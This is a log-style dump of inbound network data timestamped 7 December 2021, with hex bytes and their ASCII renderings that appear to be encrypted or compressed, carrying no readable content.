                                                                                              Data Ascii: {Jq^XqeCZ Fz-V|o0{$_(css(A7%=X7v9H4GTNvPicw/5,BEq3^{;8X?] 3)D6>S7b5oo?2YvZpZ+edo$KQ _s?'b]
                                                                                              2021-12-07 12:39:07 UTC469INData Raw: 9e 66 9a cc ac f7 30 f6 d9 bd 7d ed f1 eb e1 c2 a2 52 56 62 c7 ce d8 d3 67 8f 64 d7 1d 6d c6 d2 be 32 23 f9 3f 05 84 0b 83 b9 30 ff 7f 4f 78 b9 9e 3c 8b cb 69 87 d4 60 39 4b c6 07 ce bf af 70 fe 91 c1 f9 d7 4d e9 94 42 13 aa 39 64 7c fb 06 99 75 f2 e5 4b 46 07 54 10 dc 5d d3 bf 36 6b a4 8a e5 45 55 8b b6 ac 5b 4e 00 f9 6f 06 aa 04 ec ac 94 aa dc 26 37 55 3e 67 a8 d5 4b 5f b2 7c 47 28 da 38 3f 95 98 0c fa 07 8c 90 36 51 3a c8 ff 16 a7 2d 04 ff db 3a 81 f2 93 50 83 98 c7 78 2c 61 f7 f3 fe 1c 5f ee 24 94 da a8 b6 4e 7d 33 ac 99 c5 ad f6 cb 06 ff 93 3b ee 03 4a e7 42 f0 7f ec 3a d5 75 6e 5e dd 9e 1a 7b 6f 83 c3 71 ac ad 59 57 fc 56 d5 9c 85 26 b2 ed 82 03 be a4 5e cc 03 71 a4 ff 9b e5 00 fd df da a5 86 97 22 14 f4 34 42 3a 1e 36 e2 5c 52 ab fd f5 41 49 6c 8a
                                                                                              Data Ascii: f0}RVbgdm2#?0Ox<i`9KpMB9d|uKFT]6kEU[No&7U>gK_|G(8?6Q:-:Px,a_$N}3;JB:un^{oqYWV&^q"4B:6\RAIl
                                                                                              2021-12-07 12:39:07 UTC477INData Raw: 09 dc 18 ec 1a 9d 84 85 ba 5e 07 fe 67 f5 fb 57 c6 3c 91 fb 8f 95 97 9a c9 d3 8c cf 19 e2 01 a7 e1 b8 9f 52 7c 49 e6 2f f5 7f 11 e1 9d da 58 a6 27 7d 57 18 65 f3 e9 66 bb 6e b2 eb 3a 1e ee 13 d0 7f b6 80 ff bf 36 10 c5 bf 19 05 fe 4d d9 9d a9 09 b8 ff 3d 6e 48 e4 f2 f0 48 96 4b e4 9d 8b 44 67 ac 20 7f 50 3c 5a 32 e5 10 e3 98 5a 6b f4 6e cc 19 fc 7f 96 fa de 2e fd 34 7f 94 88 c6 da 62 af d1 49 c8 a3 f9 98 34 45 3e 7d 70 ed 9d 79 b9 6f 57 a6 ff e4 9c 8c f8 ae d6 b2 a4 28 d1 11 9d 34 e3 c4 4b 97 fc fe ea bb 8b 2c e8 47 8d 17 6e 16 5d 58 f0 e4 e1 f7 e7 dd d1 4b 16 2d d9 8d b7 56 96 53 e8 0d 16 ab 3c da e6 7b f4 60 fc 04 f8 af da ec 99 37 d8 44 2a ad 9e d1 c5 2a b5 2e d2 34 c8 76 2c ff 86 fe 77 66 68 5e 1a 05 52 3f c9 31 ec 7f bc 4a f9 8f 2a 55 29 76 71 bb d6
                                                                                              Data Ascii: ^gW<R|I/X'}Wefn:6M=nHHKDg P<Z2Zkn.4bI4E>}pyoW(4K,Gn]XK-VS<{`7D**.4v,wfh^R?1J*U)vq
                                                                                              2021-12-07 12:39:07 UTC484INData Raw: 54 f0 00 fc cf d9 cb 72 1e c8 fa af 98 ca 29 af 53 f2 5a 88 c1 ff af 70 ed d4 9c e3 c7 df 49 cc c9 28 ef c5 47 c4 92 e4 c0 ff 61 78 0b fb 1f d6 49 ec 35 8a 7e d7 e0 45 c8 ff 21 ac 7a 01 f7 ff 6e 5b f7 34 9d ea 6e b8 ff dd 82 f9 47 c6 7e 2d 9c 7f ac b3 b4 79 89 af 44 bc 6a 97 7a c9 9b 80 7f 90 aa d2 c1 85 f2 bf e3 f9 c3 fa 9b de 91 9f e6 d3 d7 23 5a 32 86 ef ff 2e 6e f0 7d d2 07 70 ff a7 e2 87 fb 7f 4c a4 35 cc 7f c3 96 c0 ff 95 8b 87 2b c0 d2 77 17 f8 df 73 08 ff cd 34 92 65 5d aa 77 d5 91 5d 86 9a 0f ee bf 7f 41 ff ff 9f ef ff 2b ad d9 93 f8 4e f9 74 b8 ff be 72 dc 92 86 fc 73 3a 85 d1 cc 7d 05 41 8b ee 01 c8 7f 1f 24 93 25 0b 0f 8a 36 b9 ed 6b 05 ff ff c1 2b a1 64 bb 5d 02 1f c8 7f 6f fa fd 1e 95 7f f4 1a f6 3f ee a0 0a 74 78 71 2b 7f 72 53 6e 9c 24 62
                                                                                              Data Ascii: Tr)SZpI(GaxI5~E!zn[4nG~-yDjz#Z2.n}pL5+ws4e]w]A+Ntrs:}A$%6k+d]o?txq+rSn$b
                                                                                              2021-12-07 12:39:07 UTC492INData Raw: 52 c8 a9 31 ca ee d8 76 88 2e f3 3a c8 10 63 2c 58 f6 f7 3d 79 f0 c0 7c 28 4d 1d df be 56 bd 57 7b ed 71 37 e9 47 05 49 72 4e 1d 36 5a 69 e6 71 03 f9 a5 92 0c 21 f1 45 d3 8c 85 17 1c 61 7c a6 9f d0 c3 8e a2 46 1a 34 46 9b 9f 59 24 9f bf e5 d8 6a 6c 72 70 90 8f 93 ce b5 3c 90 a5 70 09 9f 97 74 f9 d6 67 13 de f6 1b 4e 95 58 5f b5 08 47 04 71 0d 97 79 84 f4 f7 39 78 9c 62 ab 7e 29 3e bb 48 d3 bc aa 2c ee f8 4a f6 45 5f 96 55 e3 4b 76 92 b7 9d ec 86 cd b5 3c 58 81 7f 94 e5 ea 46 14 b6 f4 2f e1 9f c3 e6 ec 56 4c b8 aa ed 68 8f bd 36 3b c2 92 45 79 a7 90 ff a7 4a 8f 4e c4 9f 4b f8 fa 59 54 33 77 c4 b8 d3 9f 6f 8a 70 48 67 7e be ae 2e f3 98 84 22 82 c1 d9 88 28 44 52 fd b0 b7 eb 5d d6 da e7 d0 c0 df ae 3d cf ae 1f 6b b0 bb c6 7c ef 75 d2 b5 f0 fc 8c bb 4c 2b 2f
                                                                                              Data Ascii: R1v.:c,X=y|(MVW{q7GIrN6Ziq!Ea|F4FY$jlrp<ptgNX_Gqy9xb~)>H,JE_UKv<XF/VLh6;EyJNKYT3wopHg~."(DR]=k|uL+/
                                                                                              2021-12-07 12:39:07 UTC500INData Raw: b8 43 68 fd 28 47 66 12 48 46 04 ab c4 a9 d9 8c 3f 9b 16 bb 79 75 ed 86 89 f9 68 6e 9c b5 cd 74 fd 09 f5 88 de 30 f3 40 db 8c 4f 88 02 76 3d 34 7c a6 f0 f0 9b bb 3d e8 cf c2 91 6e c0 61 c6 6b 0e ee 8a e3 79 1e 7d 0e 7b 6d c4 61 27 57 1d c0 c7 11 c4 67 97 cc f6 b3 81 6b ba 3b 4c 27 c4 7d 37 ae 75 6b b9 e0 79 fb 68 53 bc c7 e5 64 d6 b0 07 f2 1b 25 ab bb 23 a7 d5 90 05 d8 02 c8 1a 6b 2c 90 f3 d4 a1 73 b4 1e ef ad 52 57 b6 7f 19 3c ff c1 f7 f0 62 5f e6 89 5f 02 02 59 fd 57 e5 21 2a 87 64 b5 11 4b fb 9c 26 52 9e b5 08 75 d0 37 d3 8d 41 2b a1 86 40 17 cd ea 54 c7 13 6b 63 26 e8 22 de ae 30 86 ea fc 48 86 3a 18 cf dc c9 6a 1f 99 cd 9c 25 9c f7 91 22 57 5d 9a 02 2b 8d 38 f7 86 7f 10 a5 9e 72 ef 69 07 20 44 da fd a4 d5 f7 df 3e 48 48 4d 97 55 90 61 a3 de 1b af 38
                                                                                              Data Ascii: Ch(GfHF?yuhnt0@Ov=4|=naky}{ma'Wgk;L'}7ukyhSd%#k,sRW<b__YW!*dK&Ru7A+@Tkc&"0H:j%"W]+8ri D>HHMUa8
                                                                                              2021-12-07 12:39:07 UTC508INData Raw: 6d 58 db 53 a9 19 ad a2 7f 21 29 e4 ea 43 b5 00 ba 1c 40 35 a0 05 9c 32 db 5d d9 40 10 b3 14 52 a3 44 2d 51 af c5 7e 75 88 01 fe e5 eb 9e a0 82 00 be 79 8e fe 87 64 90 92 ad 91 c2 0e b5 80 2e 28 66 77 2d 6c ba cd fd 26 a1 64 93 93 5e b5 dc 72 c1 d6 8f e2 d8 b2 31 61 ae 42 f7 f6 1d a9 cb 83 08 95 da 02 8f 8c 62 35 b2 f3 a7 c0 57 5e 70 aa 69 29 75 4c 0c d7 a0 6f 88 49 9f 33 bb fb 7f 87 6a 92 68 4e 59 33 2c 03 01 12 28 45 c6 2f dc 22 f0 a2 2e 0a d5 19 e6 dd 8d f9 53 41 04 8c 58 f9 9a f1 c3 f9 7b 57 4a 5e 9d 7e cc 5d 69 6c 09 a2 28 f3 83 31 c9 ad 6d 5b a1 58 80 f3 a5 f9 a7 03 52 5e d4 fe 76 58 4f e7 c4 66 91 4b 13 f0 0e ba e4 50 45 f3 62 3e 3e a9 13 80 36 b4 e9 86 a3 89 05 5f c0 a0 ee a2 74 2f 35 56 77 55 98 06 65 7f 05 79 fd af 62 69 1f b3 a9 32 f7 00 0f 30
                                                                                              Data Ascii: mXS!)C@52]@RD-Q~uyd.(fw-l&d^r1aBb5W^pi)uLoI3jhNY3,(E/".SAX{WJ^~]il(1m[XR^vXOfKPEb>>6_t/5VwUeybi20
                                                                                              2021-12-07 12:39:07 UTC516INData Raw: 8f 79 0e 59 05 b4 ab cf 7f 19 12 54 ec bf 50 ee 0a 08 8e ae 93 95 80 a5 17 17 af 81 9e 98 c3 b2 7e fc 40 37 1d 7b 2c 85 f3 1a 0a a4 ea c4 b1 32 d2 e3 3a fe b2 66 c9 a9 3f 0d 47 e2 4d 80 5f 9a 59 ed 78 f6 f1 7f f0 6a 50 09 4b 7b 75 7a 49 08 30 11 90 e1 13 cd a4 cf a1 01 32 3a 4c 64 59 34 e3 d9 02 bc 88 de 35 dc 42 0d 08 d8 88 ac 8f 94 6c 7c 3d 4f f4 a4 45 1f c7 1c 83 4c 02 73 36 e8 fc da 32 4b 7a 75 3b 5f 20 5a f3 58 de d2 5d c2 88 28 80 9f ee 12 3f f7 28 6e 8a 6b d8 6e 91 ee fd 6d 5d 0b bd 81 7f 18 bc 53 2b 7d de 98 27 59 32 5e 2e 78 93 6d cb 7d 8e 3c b7 df 4a 63 6f 07 2d 94 da ef 49 3e ae a8 3b b0 1b 84 99 a3 01 12 ba 9e 68 1e a0 2e 29 10 74 8e a2 13 2a 48 5c 9f ac 4e 43 b2 8c bd 7b 7c 6c b9 9c c2 59 0e ce fe fe bc 9c 9d 99 16 15 43 c3 fd 9a ff 56 d8 a8
                                                                                              Data Ascii: yYTP~@7{,2:f?GM_YxjPK{uzI02:LdY45Bl|=OELs62Kzu;_ ZX](?(nknm]S+}'Y2^.xm}<Jco-I>;h.)t*H\NC{|lYCV
                                                                                              2021-12-07 12:39:07 UTC523INData Raw: 0e a9 cd b0 c0 57 3f 8c 6a 8a cf 56 16 45 97 21 dd 63 2b 37 04 03 04 63 be e1 83 8e b2 b0 23 eb 4f 0e 17 ee 91 22 32 a8 79 5e f2 dc a4 12 54 b3 f4 9e 6b ea 2f ea 07 f2 1d 83 48 73 5e 23 c0 66 69 1b 9f 96 03 34 3f 96 c4 8b 51 80 c9 52 6f 1c 49 af 27 42 98 2a 6c 3a 8c 60 6b ca 07 6b c4 a9 77 57 a9 38 56 ff 51 0f ce 13 65 d4 e1 16 b1 46 86 75 45 bc 60 6c 57 cd 2d 80 01 85 5d a7 7b 21 92 00 4a fc e4 79 9f 10 7b 5d 02 96 06 53 a5 3a dd f8 6c 83 4a 5a 62 c9 b8 c2 7f e9 b3 2a cd ea b2 5d a8 5d 53 a1 64 60 88 a4 1a 28 a4 33 0b 23 53 50 8c f6 a5 2f 99 45 a4 59 2e 2e 48 31 d0 98 2c ad a4 b3 d5 96 77 a9 64 fa c9 0a a0 8e 92 e2 2f 83 39 fb bb 2d 46 da fc 8f e8 b5 4f 61 21 68 49 67 65 07 ca da 60 3f 1d a1 36 75 3b 4c e2 14 3d 39 19 07 5c 80 40 82 83 cd 30 74 14 ec 9a
                                                                                              Data Ascii: W?jVE!c+7c#O"2y^Tk/Hs^#fi4?QRoI'B*l:`kkwW8VQeFuE`lW-]{!Jy{]S:lJZb*]]Sd`(3#SP/EY..H1,wd/9-FOa!hIge`?6u;L=9\@0t
                                                                                              2021-12-07 12:39:07 UTC531INData Raw: b0 8a 5d 93 34 38 e6 b4 53 f4 6e 46 02 9c 4c c8 d2 e0 c0 3d f1 d9 49 53 f1 d8 80 23 b4 8c 01 5b c1 bc aa ea aa 84 06 26 b2 de d4 e8 73 bb d0 b6 d5 24 e2 e9 75 b2 b4 86 45 95 e9 3a ed 00 8b 70 a0 fc b3 51 21 04 7b 29 8a 5f 88 82 18 d5 ca ee 88 67 9b 28 b6 09 26 91 19 bc 94 85 fe 37 10 e4 2e 1b 6e 33 6e 9b 65 6c 68 9f aa cf 96 6b d3 0d 2d cf 55 ad a3 47 34 fa 94 01 93 d6 f8 3d 68 c7 ca d5 a1 a3 05 4e d5 fc 31 0d 5b c5 65 6b 68 fc 00 dc 1a ba a7 82 d7 c1 7c 4b c7 f8 94 9b e7 ad 19 0c 83 d2 4a de 4f 9d 40 6a c5 96 4b 70 97 0e 12 12 71 42 16 a2 af f2 44 56 0f 0e 8e 00 fe ae a6 21 05 79 d5 dd 2c e9 54 86 37 c3 98 75 de bc cc ef 85 01 c4 0a 00 cb 09 76 b0 c0 6b 30 61 57 86 a9 b1 bb ea 7c c0 6a 42 a7 9d c1 3a f8 44 8a 47 0d 85 7d 9c 41 42 10 15 b7 8e 49 86 41 0b
                                                                                              Data Ascii: ]48SnFL=IS#[&s$uE:pQ!{)_g(&7.n3nelhk-UG4=hN1[ekh|KJO@jKpqBDV!y,T7uvk0aW|jB:DG}ABIA
                                                                                              2021-12-07 12:39:07 UTC539INData Raw: db c7 8f fb 44 28 07 52 b0 97 9f d8 13 df 0e 73 83 c9 0f 08 ce dd 59 b0 15 b0 c2 23 a9 72 2e 29 a1 3f a4 3b 0b cd ef 58 9d a5 2f 87 fe 21 d6 98 41 a4 a8 30 4a ad 2c 68 ef 48 f6 15 4a d5 68 27 34 44 b1 29 94 86 be 3a dc a0 95 a9 a2 d2 8f 64 df d7 34 9c 60 e4 b0 13 3a c3 51 65 30 3f 40 c3 65 d0 f5 55 1a c3 ab 18 26 f8 99 c8 56 39 f8 b7 47 ed 4e de e5 d6 d3 cd 96 38 48 64 d7 7d b6 af f6 d1 99 3b 11 ba 14 92 86 75 39 34 82 0c ca e0 51 7f 79 6e 26 6a 04 81 1d 5c ef d7 52 a7 49 f8 ec b5 83 77 dc 77 3d 9e ae cd c5 6d 5c ae f6 5f 89 31 81 0f 71 df f6 ce 6b 0b 26 4c 59 2f 42 22 c1 99 9c 9f 42 a1 3e 2a 6d 56 80 36 0d 5f 97 f6 ab 12 8d 49 7a 18 c2 0a 23 21 1d 36 7d 52 b5 9a 4e cd 4c 33 66 32 19 4c a3 6f 6f a9 92 b7 28 ac f1 33 4c 5b 93 78 1a e5 5c 80 c4 2e 25 d2 04
                                                                                              Data Ascii: D(RsY#r.)?;X/!A0J,hHJh'4D):d4`:Qe0?@eU&V9GN8Hd};u94Qyn&j\RIww=m\_1qk&LY/B"B>*mV6_Iz#!6}RNL3f2Loo(3L[x\.%
                                                                                              2021-12-07 12:39:07 UTC547INData Raw: d5 e1 d5 ba 1f ff e2 d1 5a 76 2c b9 c4 31 9e f2 7b 4a e3 a6 b5 f5 80 00 54 b8 83 dd 63 8f be e4 72 30 28 cb 62 c4 e4 70 cc 0a a0 11 cf 14 dc 14 f1 65 5a d4 eb 43 40 65 23 cd 8e 4a 29 8d cb 3a 57 f4 6f 84 17 f1 cb 33 b8 07 64 8a 0f 2f 7a b2 be b4 a3 f1 42 fa 61 d1 b5 35 cc e4 6e 2e 44 45 8b d1 60 1d 79 cd b5 af ac 59 10 20 cb 3e 80 94 a4 f2 9f 18 b5 1b de 96 9b 77 a0 61 c6 0f 74 ec dd 94 da 69 0f 56 95 2f 71 52 08 64 e6 85 a4 e7 40 91 e6 26 81 03 da 3d 00 e6 e4 ce d3 3c 48 da 1a 5e 76 21 70 65 2f ac c6 b9 62 2a 6e 85 95 9f 1d 89 62 2e 81 51 85 3f 04 7b 06 d0 49 07 da 63 0b 36 3d 5b c8 5b af 2e d4 48 31 9e 57 25 79 c6 3e ff 51 e6 31 3e e8 95 52 77 ea b9 7a 13 b3 34 eb 4d d9 06 63 47 08 b3 7a 15 31 cf 8a 6c cf 7b 2f 00 e6 a9 b8 3a f4 c4 94 e7 3e 9f 9d 31 3d
                                                                                              Data Ascii: Zv,1{JTcr0(bpeZC@e#J):Wo3d/zBa5n.DE`yY >watiV/qRd@&=<H^v!pe/b*nb.Q?{Ic6=[[.H1W%y>Q1>Rwz4McGz1l{/:>1=
                                                                                              2021-12-07 12:39:07 UTC555INData Raw: 06 49 bd 15 83 b1 4b d8 07 29 93 fb 25 f1 61 d6 b8 b5 5f 13 54 7d af f9 89 18 5b f0 00 f5 55 53 a1 f2 c4 48 66 58 ef e4 96 50 f0 85 fd 66 3d cc 64 f2 d2 ed 69 3f 58 7b dd 34 f2 d8 f9 a2 91 e0 cf 07 d5 40 99 0d 69 d2 ac a5 bc 9e ae 2a 46 a5 61 3f bf a7 3c 7d 91 01 1d 30 86 a7 43 b2 a8 28 42 56 8b 65 0a 05 0c cf 2f 6f 5b aa bb fe 6a 69 fe 47 e3 bb 86 8e 7c 86 06 9f c4 12 65 e8 6b f2 60 8f a4 78 03 2a 94 76 09 d8 f1 e3 9d 19 75 b1 cc 8c ef 99 66 48 dd f2 c2 e2 0d 99 3c b6 81 65 9b 2f ca 03 7d 1f 1d 93 fb 9a 90 5e 24 1a 79 ad 88 dc 40 10 d2 80 95 de f3 91 a8 f2 62 61 13 55 f9 62 ea a9 2e 44 0f a4 e9 5f ba 8d 2f 5a 3b 41 76 59 2b 85 9b 19 d3 89 53 d6 2d 37 4b 18 83 42 d7 7e 22 f9 4a b3 7f 57 3b c8 03 8b 54 00 aa 4f 66 c4 23 e3 ac 72 27 22 15 be 5d d7 48 23 e9
                                                                                              Data Ascii: IK)%a_T}[USHfXPf=di?X{4@i*Fa?<}0C(BVe/o[jiG|ek`x*vufH<e/}^$y@baUb.D_/Z;AvY+S-7KB~"JW;TOf#r'"]H#
                                                                                              2021-12-07 12:39:07 UTC562INData Raw: 7b dd d1 61 59 86 15 6b 13 99 08 fc 47 01 c9 2a 53 71 d4 b8 00 10 0e 30 71 d4 c0 ee 01 2e d4 19 1d b6 b2 f3 f3 1e 16 cd 14 56 3e 44 75 4e 36 cf 65 ec 7e f1 21 07 77 0c 77 e8 d6 a7 14 bc a2 76 19 2a 5a f6 25 b0 d4 9a 15 f8 c2 8b b1 e6 cc 5a 9c 00 a3 fc a8 f1 b0 50 aa 30 75 9f 3d 54 ee 28 52 e7 71 35 e5 69 65 9a 50 66 f7 23 47 06 da 31 02 e6 51 55 ad ac 01 3b a5 8b 3d e9 60 74 f0 1e cc 1b 83 75 97 74 39 61 50 14 c0 aa cc e4 c9 84 0d 60 9f f0 49 9b aa 5e 02 b6 3c a3 86 b3 df 15 8c ea af dd eb 54 97 a0 0c d3 47 38 66 dc bc 1a 53 1a eb 7d 99 3d 3b 0d 5c 30 71 21 b0 fc f6 31 00 b2 ff 1d 54 1e 66 eb 13 bd a3 c4 64 23 60 88 8a dd fa 58 ac 51 31 e4 6d e9 b8 11 41 07 43 f3 bf f0 42 ce 72 ba c9 e1 c3 96 52 cb 74 47 4e ca fc e0 a6 62 53 17 8d c3 1e c6 c7 d7 8a 44 68
                                                                                              Data Ascii: {aYkG*Sq0q.V>DuN6e~!wwv*Z%ZP0u=T(Rq5iePf#G1QU;=`tut9aP`I^<TG8fS}=;\0q!1Tfd#`XQ1mACBrRtGNbSDh
                                                                                              2021-12-07 12:39:07 UTC570INData Raw: 0c 9a 5d f1 ee fd fd e4 e4 d1 8b fb cd 4b 60 39 ab 9e 30 b3 86 f6 15 48 85 28 7e 3d 0f a2 1a d8 63 2d 6e d1 d4 47 d2 43 cb 54 ae b8 83 16 ec 7b 91 3f 11 41 34 51 61 a3 ed d5 5b ad cd 49 6c 9a 99 a1 51 ce 88 87 dc f4 ca db 13 ea 5d f9 a3 9a f1 b9 3e 9a e0 ef f8 8a d1 f5 6e 77 44 4d 31 74 6c c0 b2 4a bb 70 da 97 b0 c4 07 4d 30 a0 cf b8 f6 2d b2 ba e6 16 bc 49 0a 99 35 e1 ee 6f 31 eb 71 cc 40 bf 4e a4 17 bd 11 71 85 10 a2 e8 fb 9e e2 34 2b 75 32 48 7b 85 70 70 6f 64 30 5f e4 4d 67 cf 9e e5 fb 8e b4 e6 42 92 d2 e4 67 6a cc 4b f4 38 4d f7 83 a1 19 93 a4 14 e9 56 5e e3 b1 a7 00 fa 3d 02 4a 63 d9 c2 6d 41 28 af 4a 55 5a e9 71 24 22 a2 f7 24 a2 01 54 a6 fd db 80 a2 3e 24 82 96 78 c2 52 dd 54 3c 8b c3 1c a2 70 b0 2d 7a 8a ed 86 73 ed f3 ad 12 9b 46 b7 18 0f 6f 3a
                                                                                              Data Ascii: ]K`90H(~=c-nGCT{?A4Qa[IlQ]>nwDM1tlJpM0-I5o1q@Nq4+u2H{ppod0_MgBgjK8MV^=JcmA(JUZq$"$T>$xRT<p-zsFo:
                                                                                              2021-12-07 12:39:07 UTC578INData Raw: 6f 5c 99 8e 84 44 fa 8c cb 78 6f 4b b5 06 c1 48 96 14 03 f1 0b c3 f9 e8 0c 35 d0 db 8c 39 e0 57 bf f0 12 fb ed 28 cf aa e5 c8 e7 f0 3a ca 2d 8d 11 8d 8b a6 07 3a 6e 70 94 c5 48 0f 59 2d 52 26 77 41 8b 31 e1 f2 46 7f fb 04 5f 9a 73 9d b5 ef 37 53 44 1a eb 84 f8 c7 cf 61 7f de 15 87 a7 ad 3e cd 63 3e 11 ea 91 f1 6c f9 49 7b 31 39 55 56 23 b8 c4 e2 1a fd 60 e3 b8 1c 9a ed 7b 78 a5 a1 08 fe 6f f5 71 ce 45 1b 2a 35 6e 80 c5 63 68 2c 94 46 41 26 18 37 d1 1a eb 22 27 95 87 d9 9a a8 26 c9 01 6a 37 27 8c f2 f1 be 95 ab 1f 06 6f 23 14 16 f9 05 34 75 61 57 65 57 ff 6f 0a 69 7a a9 2e e2 fd 7b 8b b1 1a 43 49 54 6f 7f 95 4d f9 37 85 b0 70 d9 de f1 f6 30 24 f5 91 d3 c5 d7 dd 1e e1 08 61 96 94 22 a5 40 0c 84 89 c8 25 61 b0 7b 90 ae 46 75 c4 2c af 7c df a1 6a 2b 62 4c 89
                                                                                              Data Ascii: o\DxoKH59W(:-:npHY-R&wA1F_s7SDa>c>lI{19UV#`{xoqE*5nch,FA&7"'&j7'o#4uaWeWoiz.{CIToM7p0$a"@%a{Fu,|j+bL
                                                                                              2021-12-07 12:39:07 UTC586INData Raw: 72 b7 6d 3d 69 db 6a 7c 5c 47 0a b7 a5 9e a1 fb fd 5f a3 8c 43 46 46 b6 6d 10 e1 13 1e ea 37 7f 53 f0 1a ec 1d 71 6a 0e 47 a4 15 88 1e 13 8f b4 04 24 8c 7c 7e bf e6 fc bf 29 5d 4d 14 c7 e5 0b f0 b7 32 cd 20 fa 68 06 49 93 47 67 f2 c0 0f 7f 29 e9 56 44 67 09 26 92 92 cf 31 0b 70 01 ce 32 e3 4a 0e 37 23 f9 0f 49 9e 58 d7 cf d7 6b 9e f2 ad 46 df af 6e 27 4f 0a 85 e9 8f 7f 3a 6e a8 0f ab f3 8b 03 a7 2e a1 e1 3b 4a 92 78 e8 c1 77 34 2a 14 ef 4c a1 43 66 7c 40 f0 76 7b eb f0 96 8e a6 0e ea d2 39 5e 97 69 11 a8 39 14 46 6f fe 80 19 82 2c cc 88 67 a1 29 e7 4e c3 3d c0 8c 99 c7 a7 b4 29 40 6a 3d d4 1b f4 88 26 80 0a 86 5d 71 d2 64 b3 73 94 8f a9 62 f8 ec 59 7b ce 25 38 ff 66 94 81 f1 f3 77 58 79 92 b6 52 b4 36 c8 55 b6 4b cd 8a 23 3c 16 5b 0a 31 a4 93 f0 70 55 fd
                                                                                              Data Ascii: rm=ij|\G_CFFm7SqjG$|~)]M2 hIGg)VDg&1p2J7#IXkFn'O:n.;Jxw4*LCf|@v{9^i9Fo,g)N=)@j=&]qdsbY{%8fwXyR6UK#<[1pU
                                                                                              2021-12-07 12:39:07 UTC594INData Raw: 4d 54 19 d4 f6 c5 7a 29 57 5f 46 2c 9b b2 63 9d b4 dc 29 31 7c a5 cc 8a 76 66 10 52 91 f3 88 7b 17 97 0f 31 78 39 b9 f1 cd 04 0a 3b 7f 35 78 b1 1c 25 34 b6 77 9c c8 ac 5e 07 09 9d 54 aa b6 83 00 b5 7b 91 b5 dd b5 e7 f7 fe 52 e9 79 3b 78 8d 92 43 8a 96 da f4 cf 0d 73 dc 8e c4 c8 28 06 94 3c 70 8b ff b9 60 ec 1c 31 28 50 00 ad 87 c7 44 60 8d 1b 22 57 26 e9 a0 e4 72 e8 77 2f 89 51 2f 11 b9 4f 87 e1 aa 9a 2c f4 c8 f6 c4 17 e5 f5 73 d9 22 9c 0a 47 11 13 84 f1 db 9a 9e b2 8a 4a 76 1f 04 34 e6 40 57 39 d6 05 ea 0b d5 6e ab 9d a1 cc a1 d2 34 82 56 bc 29 58 76 6f b3 da 71 03 8d df d5 3d 7e 10 c1 06 75 89 c6 9c 2e f3 f7 a1 8b 76 ed 24 85 fd 9a f7 6d 08 50 37 10 f4 36 df fe fe ed f6 44 c1 a4 42 c5 45 53 ca e7 3d d3 8a 2c 61 e2 19 de b8 43 74 c8 4e 06 fc 10 d4 1e 6f
                                                                                              Data Ascii: MTz)W_F,c)1|vfR{1x9;5x%4w^T{Ry;xCs(<p`1(PD`"W&rw/Q/O,s"GJv4@W9n4V)Xvoq=~u.v$mP76DBES=,aCtNo
                                                                                              2021-12-07 12:39:07 UTC602INData Raw: 56 11 f3 66 e6 40 72 f6 97 b8 a3 3a 07 00 89 d3 fd 4a bb 61 b8 36 73 f0 8b 45 f5 3e a1 91 35 32 6b 83 0c 3c aa 98 2e a2 68 57 35 73 3d 63 72 1a c9 35 5b 7d 87 6d 12 d8 aa 6e 8c e8 fd b0 04 72 4f 18 35 cd 49 f6 fa 7d f2 c2 57 6b e4 a5 92 10 ab 5c 50 a9 39 4e 0c 75 0d cd 66 f5 cd 18 3e ee 59 85 b0 db fe 55 91 c2 1b d5 10 29 7c 77 09 a0 b1 bc 87 ad a0 5b 34 52 d0 38 b5 d9 54 9c 33 68 45 c3 e4 aa a3 47 ff 21 bc 1d f4 4e 54 74 8a 96 a6 68 4f aa f5 2c bc a7 6d 15 14 a4 17 ed 85 27 5b 68 0e 36 ae 4e 81 8b 68 97 e8 24 bd 8f 69 59 c5 2f 6a 78 79 83 dc 68 35 3d 10 44 72 fb f3 04 bc 2a 00 2c e3 a9 25 a7 e3 e8 fa ab 3d 9b 62 01 c0 dc 0f 39 ab e4 31 c0 b0 a6 5f 78 b1 d9 23 48 ec 40 d1 45 e0 91 f3 77 1e 91 3a 77 ef 3c 80 a1 12 82 a8 f3 61 a8 66 51 b6 9f f9 b4 89 39 94
                                                                                              Data Ascii: Vf@r:Ja6sE>52k<.hW5s=cr5[}mnrO5I}Wk\P9Nuf>YU)|w[4R8T3hEG!NTthO,m'[h6Nh$iY/jxyh5=Dr*,%=b91_x#H@Ew:w<afQ9
                                                                                              2021-12-07 12:39:07 UTC609INData Raw: 2b 29 7f 84 9f b4 cb 4a 43 c5 9a 9f 2c 51 3f b6 72 a0 24 98 a9 9e 2f d6 e2 bb 19 3a 1b 0c 05 f8 65 02 8d b6 91 a4 55 5c 4b 47 05 cc 79 b4 f8 96 97 3a c6 e4 0a ed 41 f8 bb a7 c6 85 5c 60 fc 7f 8a 5a de 52 5d ec 8d 66 cd 0e 85 eb c3 68 38 55 8b da be a5 f4 14 7a df 6a 0e b6 ba 7c 5a 72 d3 a4 8b ab 14 53 1e 24 e0 fa 1f 6e 1e 65 5b d0 cf 44 d7 8e 40 61 85 7f 04 e3 ce 01 08 2a 42 35 ce 97 c1 27 ba 0c 43 44 78 95 2a 60 8c f1 e7 82 66 f1 64 71 11 5e 98 40 0c 09 5e a3 23 c8 67 ad e0 ff 2e 4f 5b 2d 16 6a 54 8f fb 60 b1 fa 69 b8 fe b3 74 3c 7a f0 39 66 cf 63 0d f1 41 ae 18 b0 22 ac 5b fd ef 32 d6 59 65 d5 0c 8a 88 b9 90 02 33 1a c3 e7 6a 93 df 22 23 41 38 8c 36 72 4f a4 b2 85 b0 56 ec 07 57 da 2b 97 4c 0e d2 04 ae 5e 00 5b 1b a7 8d b1 da 78 c9 26 f7 70 1a ed 23 ec
                                                                                              Data Ascii: +)JC,Q?r$/:eU\KGy:A\`ZR]fh8Uzj|ZrS$ne[D@a*B5'CDx*`fdq^@^#g.O[-jT`it<z9fcA"[2Ye3j"#A86rOVW+L^[x&p#
